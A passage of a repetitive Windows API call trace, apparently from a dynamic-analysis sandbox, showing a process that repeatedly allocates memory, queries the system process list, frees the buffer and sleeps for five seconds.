BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.013] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.054] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.107] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.109] NtQuerySystemInformation (in: 